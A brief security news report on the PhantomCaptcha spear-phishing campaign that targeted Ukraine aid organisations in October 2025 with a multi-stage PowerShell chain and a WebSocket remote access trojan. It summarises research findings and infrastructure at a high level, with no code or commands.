PhantomCaptcha Hits Ukraine Aid With WebSocket RAT

A spear-phishing campaign known as PhantomCaptcha hit Ukraine aid groups on October 8, 2025, deploying a WebSocket-based remote access trojan. SentinelOne researchers identified that attackers impersonated the Ukrainian President’s Office to send malicious PDF files to organizations like the Red Cross, UNICEF and local administrations. Victims were redirected to a fake Zoom site hosting malware.

The PhantomCaptcha Hits Ukraine Aid campaign used a multi-stage PowerShell payload. The first stage fetched a downloader, the second exfiltrated system data and disabled history logging, and the third delivered a WebSocket RAT. This final stage granted attackers remote shell access and persistent control of infected systems.

The infrastructure, including zoomconference[.]app, was hosted on Russian servers and remained active for only 24 hours. Still, command-and-control nodes continued operating. SentinelOne linked related IPs and domains to the same group and found fake Android apps tied to the operation. Researchers noted possible links to the Russian APT group COLDRIVER.

PhantomCaptcha targets Ukraine relief groups with WebSocket RAT in October 2025